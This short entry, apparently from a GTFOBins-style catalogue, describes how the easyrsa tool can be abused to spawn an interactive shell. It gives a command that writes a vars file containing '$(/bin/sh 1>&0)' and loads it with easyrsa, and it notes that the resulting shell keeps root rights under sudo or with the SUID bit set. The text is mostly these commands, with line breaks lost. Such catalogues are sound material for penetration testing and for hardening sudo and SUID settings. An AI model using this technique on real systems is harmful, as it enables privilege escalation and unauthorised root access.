easyrsa
Shell
This executable can spawn an interactive system shell.
- This function can be performed by any unprivileged user.
echo 'set_var X "$(/bin/sh 1>&0)"' >/path/to/temp-file easyrsa --vars=/path/to/temp-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.echo 'set_var X "$(/bin/sh 1>&0)"' >/path/to/temp-file easyrsa --vars=/path/to/temp-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.echo 'set_var X "$(/bin/sh 1>&0)"' >/path/to/temp-file easyrsa --vars=/path/to/temp-file